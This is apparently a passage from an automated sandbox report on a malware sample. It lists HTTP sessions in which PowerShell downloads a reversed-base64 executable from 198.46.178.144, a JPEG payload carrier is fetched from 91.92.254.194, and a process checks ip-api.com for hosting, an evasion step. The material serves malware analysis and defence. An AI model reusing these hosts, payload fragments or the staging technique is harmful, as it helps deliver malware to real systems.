                  Data Ascii: Y w/-\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+ED
                  Jul 5, 2024 07:26:24.556307077 CEST1236INData Raw: 59 4e c2 36 f3 c1 02 89 bf 8e 31 a4 8d 04 55 b5 80 6e 5a c8 e0 fb 7c 4f 1d 7e 47 03 6c 6a 89 6d e3 6d 91 d4 60 e5 d5 97 51 7c 6d e8 73 3c ea 02 31 51 c5 00 70 4f aa 81 51 a4 92 54 55 a2 4e e3 c0 03 ae 05 fc 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1
                  Data Ascii: YN61UnZ|O~Gljmm`Q|ms<1QpOQTUNfmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%
                  Jul 5, 2024 07:26:24.556317091 CEST224INData Raw: 99 04 db 52 c9 da 43 16 ae bb 81 e3 e8 30 88 36 05 66 40 c6 98 d1 3f 5c cf 45 2a e1 9b f0 a8 a0 6f 8c 3f 98 d2 53 8b ae d4 2f 00 e5 cb 44 81 1b 8d d6 a0 30 34 7f d5 e1 e3 24 20 62 c1 9d 58 d0 3d 86 66 34 cb 13 04 40 08 04 5d 12 30 90 ea 1d 24 2e
                  Data Ascii: RC06f@?\E*o?S/D04$ bX=f4@]0$.P0q6B@s`A$qfIf&wR5<Z<1iTpU-wbZ([d]#e6yi%@#`^v<^5)*AbDp
                  Jul 5, 2024 07:26:24.636833906 CEST1236INData Raw: 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db
                  Data Ascii: fcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                  Jul 5, 2024 07:26:24.636919022 CEST1236INData Raw: b4 b7 5c 10 66 00 ed 41 c7 52 70 04 94 d3 2d 1d a4 b1 fe 43 3e e1 f6 47 4a fa 8f d9 77 85 42 8c 81 a6 f1 2d 44 44 c8 c1 7f 1e 9e 64 ee 47 f8 bf f7 e9 9f 0d 7b 0e 18 2f 3f a6 7d ab ec 46 a3 4e 9f b2 c8 75 5a e7 61 1c 3e 36 d2 46 b1 d1 26 a2 06 8f
                  Data Ascii: \fARp-C>GJwB-DDdG{/?}FNuZa>6F&,5UjRG"*{w9?j_H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:$
                  Jul 5, 2024 07:26:24.636930943 CEST1236INData Raw: cd 75 46 06 58 be fd 14 a5 18 f4 a8 82 d7 d6 b3 16 27 94 fd a0 d5 b0 1b a4 30 81 ea eb d1 70 32 cc c7 c6 4b 95 0a 46 a2 1b 1d ba 1c 0f 4b f6 cb c7 a2 d4 f8 bf 86 6b 22 13 2a ab 02 c8 c4 15 0a ac ad c5 73 d8 67 ae 97 ed 8e 88 23 21 d3 3b 29 17 b8
                  Data Ascii: uFX'0p2KFKk"*sg#!;)|+MYe6]M}GBV)/n^X f{ U/Mv0nQ)R{dvhn C_oz>hqw>qJh,O]4(M3=$prNHs1ixp}
                  Jul 5, 2024 07:26:24.637089014 CEST1236INData Raw: d4 1c 0f 4e 9f 69 74 e0 12 21 90 df 52 5b ae 43 f8 ee 9e 48 c0 30 c8 2f b8 6a 39 85 0c 04 8d bd 47 be 1a 5d 2b 42 02 b9 36 39 aa c0 d9 8b c5 b4 0e a5 3c 89 41 5f e2 26 f0 4d e2 30 ed 67 11 b5 76 e4 0f ae 66 42 db 45 91 57 c5 e1 9d 4a a8 25 41 07
                  Data Ascii: Nit!R[CH0/j9G]+B69<A_&M0gvfBEWJ%A(F ey{=^,<7Rg:)%Y14eJ<auz})TI"p=Fqp0kfpU|/e>Oq};3FYmxa|I'4J:B=
                  Jul 5, 2024 07:26:24.637195110 CEST1236INData Raw: 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35 d8 60 43 fe 06 51 cd 9b 19 78 95 96 15 60 8a 2c d1 c9 82 64 8c 16 64 26 f0 ab 3c 0e de a4 60 09 ba be d8 02 fb
                  Data Ascii: 80/`vI<R@i*$!@BH5`CQx`,dd&<`iA*<i;As-#@+4e8L04~s1v{5esq1ibdd0C,)(uhtmoT8PdH*rv#e)v;@Ish
                  Jul 5, 2024 07:26:28.701697111 CEST59OUTGET /imge/new-image_v.jpg HTTP/1.1
                  Host: 91.92.254.194
                  Jul 5, 2024 07:26:28.882263899 CEST1236INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 05:26:28 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                  Last-Modified: Wed, 03 Jul 2024 13:17:15 GMT
                  ETag: "67fd9-61c57a629b9c6"
                  Accept-Ranges: bytes
                  Content-Length: 425945
                  Content-Type: image/jpeg
                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5*sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/*Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4ApC.J9x$,i${`ULP)`H


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.2249164198.46.178.144801904C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 07:26:27.578470945 CEST88OUTGET /madamwebbbbbbbas6444.txt HTTP/1.1
                  Host: 198.46.178.144
                  Connection: Keep-Alive
                  Jul 5, 2024 07:26:28.087299109 CEST1236INHTTP/1.1 200 OK
                  Content-Type: text/plain
                  Last-Modified: Tue, 02 Jul 2024 09:00:11 GMT
                  Accept-Ranges: bytes
                  ETag: "96b1143f5eccda1:0"
                  Server: Microsoft-IIS/10.0
                  Date: Fri, 05 Jul 2024 05:26:28 GMT
                  Content-Length: 325632
                  Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8DUAAAAMAwAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgCN4TesJWblN3ch9CPK0gPvZmbJR3c1JHdvwDIgoQD+kHdpJXdjV2cvwDIgACIK0gPzV2ZlxWa2lm
                  Jul 5, 2024 07:26:28.087461948 CEST1236INData Raw: 63 51 52 57 5a 30 4e 58 5a 31 46 58 5a 79 39 43 50 67 41 43 49 67 41 43 49 4b 30 67 50 76 49 53 5a 7a 78 57 59 6d 4a 53 50 7a 4e 58 5a 6a 4e 57 51 70 56 48 49 69 49 58 5a 72 39 6d 64 75 6c 30 63 68 4a 53 50 73 56 6d 64 6c 78 47 49 73 56 6d 64 6c
                  Data Ascii: cQRWZ0NXZ1FXZy9CPgACIgACIK0gPvISZzxWYmJSPzNXZjNWQpVHIiIXZr9mdul0chJSPsVmdlxGIsVmdlxkbvlGd1NWZ4VEZlR3clVXclJHPgACIgACIgAiCN4jIzYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegMXZnVGbpZXayBFZlR3clVXclJHPgACIgACIK0gP5RXayV3YlNHPgACIgoQD+IiM25
                  Jul 5, 2024 07:26:28.087471962 CEST448INData Raw: 41 77 41 41 4d 41 45 41 41 41 45 41 2b 41 41 41 41 76 42 67 5a 41 34 47 41 4a 42 51 5a 41 77 47 41 70 42 67 52 41 63 47 41 75 42 51 61 41 49 48 41 30 42 77 55 41 45 41 41 41 49 41 48 45 41 4c 41 41 41 41 41 41 41 41 41 75 42 77 62 41 6b 47 41 30
                  Data Ascii: AwAAMAEAAAEA+AAAAvBgZA4GAJBQZAwGApBgRAcGAuBQaAIHA0BwUAEAAAIAHEALAAAAAAAAAuBwbAkGA0BQYAwGAzBgbAEGAyBAVAAAAEAAJAAAAAAwbAYGAuBQSAUGAsBQaAYEAyBQYAYFABAAAAQEAAAAAAAAAAAAAAAAAAAQAAAAAEAAAAAAAAAwPAAAAAAQAAAAAAAAAAEAAAAQAAAg/vTQvAAAAAAwTAYEAOBQSA8FAOB
                  Jul 5, 2024 07:26:28.087481976 CEST1236INData Raw: 41 51 42 41 41 41 67 42 67 41 41 41 49 41 41 41 41 51 41 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                  Data Ascii: AQBAAAgBgAAAIAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                  Jul 5, 2024 07:26:28.087492943 CEST1236INData Raw: 4c 42 4b 52 48 42 41 77 42 49 67 51 4c 42 4b 52 48 74 45 6f 45 74 45 6f 45 64 67 67 44 48 63 51 45 68 45 52 49 52 49 67 41 41 63 51 67 41 4b 52 48 41 41 67 42 49 45 49 67 53 30 42 43 44 63 41 43 41 34 52 41 5a 4c 6f 45 56 63 41 41 54 67 51 41 43
                  Data Ascii: LBKRHBAwBIgQLBKRHtEoEtEoEdggDHcQEhERIRIgAAcQgAKRHAAgBIEIgS0BCDcACA4RAZLoEVcAATgQACAiBA4RA9JRFGgAAegQBdgQ1CKhBHwQwCKBAgUQzCKRABAiBNLoEAAQBOUsgSEAAGggDOUZgSElEBLoE9KoEHcAEIgQdR4ABHcQDOEAAEgQDNIAAFsQDBAABLAAIDErgSEQtCKRFIAwEBUrgSUBAgkQsCKRAlFoEVg
                  Jul 5, 2024 07:26:28.087560892 CEST1236INData Raw: 46 47 63 67 45 49 67 67 44 64 34 51 41 4e 4a 52 46 4f 67 67 44 4f 34 51 48 59 46 6f 45 4f 45 51 54 53 55 78 43 48 6b 42 43 73 46 6f 45 73 46 6f 45 42 30 6b 45 56 4d 77 42 4e 51 57 67 52 45 67 43 46 55 6e 67 52 6f 51 41 41 59 77 43 4f 45 41 41 45
                  Data Ascii: FGcgEIggDd4QANJRFOggDO4QHYFoEOEQTSUxCHkBCsFoEsFoEB0kEVMwBNQWgREgCFUngRoQAAYwCOEAAEwVgREgCFgwBIgwBIgACIogCIgwCcFYEdgACIgwEHgBCD0BCIggDdgACIkwBNAWgREgCF0QDBAAB1JYELEAAGUngRcQAAYQdCGBCBAgB1JYE1JYE1JYECAwCIcACIcACK0hCIgwCIgACH8wBSgACIMwBFgACI4QANJ
                  Jul 5, 2024 07:26:28.087572098 CEST672INData Raw: 44 6c 47 6f 45 59 34 41 51 42 4b 52 41 4e 4a 52 46 54 63 51 4a 44 34 51 41 41 51 41 43 44 30 78 41 64 67 67 44 64 4d 51 48 41 46 6f 45 4f 34 67 44 4f 34 67 44 64 34 67 44 41 46 6f 45 42 30 6b 45 56 41 78 42 66 67 67 44 49 34 41 43 46 30 52 42 64
                  Data Ascii: DlGoEY4AQBKRANJRFTcQJD4QAAQACD0xAdggDdMQHAFoEO4gDO4gDd4gDAFoEB0kEVAxBfggDI4ACF0RBd4ACHwACO4gAdJRFOIQwBGRFAFoEOAVgS4AQBKRANJRFHcgHIAUgSEQTSUBQBKhDO4ACI4gDAFoEB0kEVswBbMQHAACBDEgCDgACOggDD0xAOgQHD0xAdgACI4wBUgACO0BQBKRANJRFAFoEO4QpBKhDlGoEAFoEB0
                  Jul 5, 2024 07:26:28.087582111 CEST1236INData Raw: 41 54 45 77 45 41 4d 52 41 44 41 53 43 4f 34 67 44 44 6b 6b 67 53 55 42 43 49 4d 51 48 49 34 51 48 41 46 6f 45 4f 55 51 48 4f 34 67 44 64 34 41 43 4f 34 67 44 44 6b 6b 67 53 55 52 41 4e 4a 52 46 41 46 6f 45 4f 55 51 48 63 55 61 67 53 67 67 44 4f
                  Data Ascii: ATEwEAMRADASCO4gDDkkgSUBCIMQHI4QHAFoEOUQHO4gDd4ACO4gDDkkgSURANJRFAFoEOUQHcUagSggDO4wAJJoEVEQTSUBQBKRANJRFVcgPIAUgSEQTSUBQBKhDO4gDIAZgSgVgSUQHF0BQBKRANJRFO4wBkgQBdggAAYQUSEQAgUQRCGR0BKRUSEwAgsACVGoEBJoERHoEZIR3BKhDNHoEIcQFIAUgSEQTSUBQBKhDO4gDO4
                  Jul 5, 2024 07:26:28.087728024 CEST1236INData Raw: 45 42 30 6b 45 56 34 77 42 76 51 65 67 53 45 51 34 41 47 52 46 49 51 65 67 53 45 51 54 53 55 78 42 49 6b 41 35 42 4b 52 41 68 44 59 45 56 67 67 44 64 41 55 67 53 45 51 54 53 55 42 35 42 4b 42 51 42 4b 42 34 42 4b 68 44 4f 30 68 44 41 46 6f 45 42
                  Data Ascii: EB0kEV4wBvQegSEQ4AGRFIQegSEQTSUxBIkA5BKRAhDYEVggDdAUgSEQTSUB5BKBQBKB4BKhDO0hDAFoEB0kEV0wBqgACOMgDFcwBIMQHI4QHD0BCO0BQBKhDO0hDO0hDO0hDO4AQBKRANJRFOMxBkMQHBEAIFMACBACBIgACIMQHIgwBHoAHd4QAAUAHcwhDDAgBIwRHc0BCO0BCO0hDd4QHOggDO0hDd4QANJRFPcQHA4RAlF
                  Jul 5, 2024 07:26:28.087738991 CEST1236INData Raw: 41 67 6b 51 32 42 47 52 41 42 41 69 42 78 46 52 41 42 41 53 42 49 55 51 48 4f 30 63 67 53 34 51 30 42 4b 52 7a 42 4b 52 42 64 67 77 42 53 45 77 45 41 41 43 42 41 46 6f 45 4f 49 51 79 42 47 52 46 4a 45 77 45 41 4d 68 41 4a 48 59 45 56 41 41 49 4c
                  Data Ascii: AgkQ2BGRABAiBxFRABASBIUQHO0cgS4Q0BKRzBKRBdgwBSEwEAACBAFoEOIQyBGRFJEwEAMhAJHYEVAAILAUgS4gAFHoEVkQATAwECUcgSUBAgsAQBKhDCEcgRURCAFoEOIQvBKRFJ4gDC0lEVYgDOIQXSUhDCEcgRUBDBMBATIQwBGRFAAyCO4gAdJRFOIQvBKRFMEwEAMhA9GoEVAAILAUgS4gAdJRFIgAQBKhDCkcgRUxAdA
                  Jul 5, 2024 07:26:28.092379093 CEST1236INData Raw: 43 44 63 67 42 63 45 51 41 41 51 67 41 51 77 52 41 43 41 67 42 49 77 68 41 44 63 51 42 4e 45 51 41 67 51 51 56 42 4b 52 41 42 41 69 42 78 45 42 41 41 51 51 54 42 4b 42 41 67 55 41 43 59 34 41 43 45 63 67 42 49 67 41 57 52 67 56 45 45 63 41 43 51
                  Data Ascii: CDcgBcEQAAQgAQwRACAgBIwhADcQBNEQAgQQVBKRABAiBxEBAAQQTBKBAgUACY4ACEcgBIgAWRgVEEcACQJRAKQACQJBUSAlEEcQCMJRAKQAAeAgHA4BEA4xABABDIwkEMJBTSQwBJ4gDBIAIF4gDCIAAF4AHBACBBFoEAASBFFoEAASB9EoEAASBIUUgSUUgSIQQBKRQBKRPBKROBKBCHYBCY4QHI4QHFcQCIEQAAQAC1FRdRI


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.2249165208.95.112.1801444C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 07:26:29.451122046 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Connection: Keep-Alive
                  Jul 5, 2024 07:26:29.934072018 CEST175INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 05:26:29 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 60
                  X-Rl: 44
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false
                  Jul 5, 2024 07:26:30.143022060 CEST175INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 05:26:29 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 60
                  X-Rl: 44
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.2249166198.46.178.144801904C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 07:26:32.318870068 CEST88OUTGET /madamwebbbbbbbas6444.txt HTTP/1.1
                  Host: 198.46.178.144
                  Connection: Keep-Alive
                  Jul 5, 2024 07:26:32.810349941 CEST1236INHTTP/1.1 200 OK
                  Content-Type: text/plain
                  Last-Modified: Tue, 02 Jul 2024 09:00:11 GMT
                  Accept-Ranges: bytes
                  ETag: "96b1143f5eccda1:0"
                  Server: Microsoft-IIS/10.0
                  Date: Fri, 05 Jul 2024 05:26:32 GMT
                  Content-Length: 325632
                  Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8DUAAAAMAwAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgCN4TesJWblN3ch9CPK0gPvZmbJR3c1JHdvwDIgoQD+kHdpJXdjV2cvwDIgACIK0gPzV2ZlxWa2lm
                  Jul 5, 2024 07:26:32.810431004 CEST224INData Raw: 63 51 52 57 5a 30 4e 58 5a 31 46 58 5a 79 39 43 50 67 41 43 49 67 41 43 49 4b 30 67 50 76 49 53 5a 7a 78 57 59 6d 4a 53 50 7a 4e 58 5a 6a 4e 57 51 70 56 48 49 69 49 58 5a 72 39 6d 64 75 6c 30 63 68 4a 53 50 73 56 6d 64 6c 78 47 49 73 56 6d 64 6c
                  Data Ascii: cQRWZ0NXZ1FXZy9CPgACIgACIK0gPvISZzxWYmJSPzNXZjNWQpVHIiIXZr9mdul0chJSPsVmdlxGIsVmdlxkbvlGd1NWZ4VEZlR3clVXclJHPgACIgACIgAiCN4jIzYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegMXZnVGbpZXayBFZlR3clVXclJHPgACIgACIK0gP5RXayV3
                  Jul 5, 2024 07:26:32.810442924 CEST1236INData Raw: 59 6c 4e 48 50 67 41 43 49 67 6f 51 44 2b 49 69 4d 32 35 53 62 7a 46 6d 4f 74 39 32 59 74 51 6e 5a 76 4e 33 62 79 4e 57 61 74 31 79 63 68 31 57 5a 6f 4e 32 63 36 34 6d 63 31 4a 53 50 7a 35 47 62 74 68 48 49 76 5a 6d 62 4a 52 33 63 31 4a 48 64 38
                  Data Ascii: YlNHPgACIgoQD+IiM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2c64mc1JSPz5GbthHIvZmbJR3c1JHd8ACIK0gPvICcwFmLu9Wa0F2YpxGcwFUeNJSPl1WYuBiIw4CMuAjLxISPu9WazJXZ2BSe0lGduVGZJlHbi1WZzNXY8ACIK0gPiAjLxISPu9WazJXZWR3clZWauFWbgISM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN
                  Jul 5, 2024 07:26:32.810487032 CEST1236INData Raw: 41 41 41 77 54 41 59 45 41 4f 42 51 53 41 38 46 41 4f 42 77 54 41 6b 45 41 54 42 67 55 41 55 45 41 57 42 77 58 41 4d 46 41 57 42 41 41 41 51 6a 41 38 43 41 41 41 41 41 41 41 41 41 41 41 41 51 41 71 44 77 41 6a 7a 46 41 41 41 41 41 41 41 41 41 41
                  Data Ascii: AAAwTAYEAOBQSA8FAOBwTAkEATBgUAUEAWBwXAMFAWBAAAQjA8CAAAAAAAAAAAAQAqDwAjzFAAAAAAAAAAAAACwLADAOoAAAAQCAAAAAABAAAAAAAAAAAAAAAAAAAACAAoBAAAEAABAAAAAAAAAAAAAAAAAAAAAAAACAAAAAABAAAAAAAAAAAAAAAAAAAACAA4AAAAEAABAAAAAAAAAAAAAAAAAAAACAAQBAAAgBgAAAIAAAAQA
                  Jul 5, 2024 07:26:32.810501099 CEST1236INData Raw: 49 4d 55 49 67 53 41 41 41 46 6b 76 67 53 59 41 42 4b 6b 76 67 53 45 67 41 67 63 51 39 43 4b 52 48 41 41 69 42 4e 4d 6f 45 42 4d 6f 45 42 41 41 43 49 67 51 41 43 41 53 42 46 4d 59 45 41 41 53 42 4a 4d 6f 45 41 41 51 42 49 55 77 67 52 55 77 67 52
                  Data Ascii: IMUIgSAAAFkvgSYABKkvgSEgAgcQ9CKRHAAiBNMoEBMoEBAACIgQACASBFMYEAASBJMoEAAQBIUwgRUwgRUwgRUwgRkhEZIRADKR/CKRgAKR+CKR9CKR8CKR7CGhDHgCCI0hEF0BBHgAHCEAAEgQRBKhDxKoEOEugSYwBO4Q6CKRAgYQ5CKBAgUACxKoEBUrgSUhDxKoE9EoEhLoEOcwBWkIgSAAAF4QLBKRHBAwBIgQLBKRHtE
                  Jul 5, 2024 07:26:32.810595989 CEST1236INData Raw: 42 64 34 77 42 48 38 41 43 56 49 6f 45 52 48 6f 45 46 30 52 46 43 4b 52 4e 43 4b 52 47 43 4b 52 42 64 67 77 42 57 77 68 41 42 41 43 42 41 47 6f 45 42 45 4f 67 52 55 42 43 63 34 51 48 53 49 41 49 47 67 41 67 42 4b 52 41 68 44 59 45 56 67 51 42 64
